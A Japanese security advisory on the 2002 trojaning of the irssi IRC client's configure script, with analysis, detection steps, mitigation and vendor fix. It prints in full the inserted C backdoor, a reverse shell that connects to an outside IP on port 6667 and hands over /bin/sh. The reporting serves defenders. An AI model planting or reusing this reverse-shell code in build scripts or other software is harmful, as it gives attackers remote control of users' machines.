irssiウェブサイトが乗っ取られ、ソースコードにバックドアが仕掛けられる | ScanNetSecurity
2025.12.07(日)

irssiウェブサイトが乗っ取られ、ソースコードにバックドアが仕掛けられる

◆概要:
 2002年3月中旬、Timo Sirainen氏のUnix向けオープンソースモジュールIRCクライアント、irssiをホストしているサーバーの設定スクリプトに対し、リモートユーザーがirssiのインストールされているホストでコマンドを実行できるバックドアが仕掛けられた。

国際 海外情報
24 views
facebookLINE
◆概要:
 2002年3月中旬、Timo Sirainen氏のUnix向けオープンソースモジュールIRCクライアント、irssiをホストしているサーバーの設定スクリプトに対し、リモートユーザーがirssiのインストールされているホストでコマンドを実行できるバックドアが仕掛けられた。

 IPアドレスが204.120.36.206、209.164.15.215の攻撃者はリモートでコマンドを実行できた。さらに、irssi 0.8.4のリリース後から短期間、irssiの設定スクリプトがトロイの木馬に改造されていた。設定スクリプトに追加されたデータは以下の通り。

int s;
struct sockaddr_in sa;
switch(fork()) { case 0: break; default: exit(0); }
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
exit(1);
}

/* HP/UX 9 (%@#!) writes to sscanf strings */

memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("204.120.36.206");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
exit(1);

}dup2(s, 0); dup2(s, 1); dup2(s, 2);

/* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */

{ char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }

◆情報ソース:
・irssi Website ( http://real.irssi.org/?page=backdoor ), May 28, 2002
・BugTraq (Martin Ostlund, martin@webtech.se), May 25, 2002
・iDEFENSE Intelligence Operations, May 28, 2002

◆分析:
 (iDEFENSE米国)irssiがバックドア作成、データ改ざんをトロイの木馬に改ざんされた後にirssiをダウンロード、インストールしたユーザーは、無許可の攻撃者からコンピューターにアクセスされている可能性が高い。機密ファイルやパスワードの盗用、セキュリティ設定の変更などの被害を受けている可能性もある。

◆検知方法:
 irssi 0.8.4でこの問題が確認されている。バックドアは、ビルドバイナリーではなく、設定スクリプトにのみ仕掛けられている。バックドアが仕掛けられているか確認するには、当該製品のウェブサイト、 http://real.irssi.org/?page=backdoor で公表されている以下のリストを用いてチェックする。

・バイナリーからirssiをインストールした場合は安全である。
・Debianソースにはバックドアは仕掛けられていない。
・Nightlyソーススナップショットにはバックドアは仕掛けられていないようだ。
・CVSにはバックドアは仕掛けられていないようだ。
・irssi-0.8.4.tar.bz2ファイルにはバックドアは仕掛けられていないが、.gzには仕掛けられている。
・.bz2ファイルを使用していたが、FreeBSDポートにはバックドアは仕掛けられていない。 ? irssi/SILCクライアントにはバックドアは仕掛けられていない。
・irssiがirssi.orgからGLibソースをダウンロードした場合、ソースにはバックドアが仕掛けられている(irssiの設定スクリプトと同じ)。
・現在でもソースが使用可能な場合、設定スクリプト、grep SOCK_STREAMで確認する。何らかの行が返された場合には、バックドアが仕掛けられている。
・発表された元々のirssi-0.8.4.tar.gzのmd5のチェックサムは57bf9d89638be3d377be211f0b0d7049である。0.8.4aの場合も同様である。

◆暫定処置:
 全ての/bin/shプロセスを強制終了するか、再起動して、設定プロセスが実行されないようにする。

◆ベンダー情報:
 最新版の0.8.4aは、 http://real.irssi.org/?page=download#sources で入手可能。Sirainen氏はiDEFENSEに対し、これはサーバーが乗っ取られる前に発表されたバージョンであると語った。


※この情報はアイ・ディフェンス・ジャパン
 ( http://www.idefense.co.jp/ )より提供いただいております。
  アイディフェンス社の iAlert サービスについて
  http://shop.vagabond.co.jp/p-alt01.shtml
  情報の内容は以下の時点におけるものです。
 【18:44 GMT、05、28、2002】

《ScanNetSecurity》

PageTop

アクセスランキング

  1. 期限警告 金銭未払 情報漏えい ~ 迷惑メール「HEUR:Hoax.Script.Scaremail」が受信者を脅しそして煽る 5 つのパターン

    期限警告 金銭未払 情報漏えい ~ 迷惑メール「HEUR:Hoax.Script.Scaremail」が受信者を脅しそして煽る 5 つのパターン

  2. 流出先での営業活動が新たに判明 ~ ヤマト運輸の元従業員による情報不正持ち出し

    流出先での営業活動が新たに判明 ~ ヤマト運輸の元従業員による情報不正持ち出し

  3. 感染が確認された機器は一部サーバに限定 ~ ユーザックシステムへのランサムウェア攻撃

    感染が確認された機器は一部サーバに限定 ~ ユーザックシステムへのランサムウェア攻撃

  4. FortiGate の SSL-VPN 廃止受けた設定最適化サービス

    FortiGate の SSL-VPN 廃止受けた設定最適化サービス

  5. 大企業における VPN 時代の終焉ほか ~ Zscaler 2026年サイバーセキュリティトレンド

    大企業における VPN 時代の終焉ほか ~ Zscaler 2026年サイバーセキュリティトレンド

ランキングをもっと見る
PageTop
ホーム 国際 海外情報 記事
TOP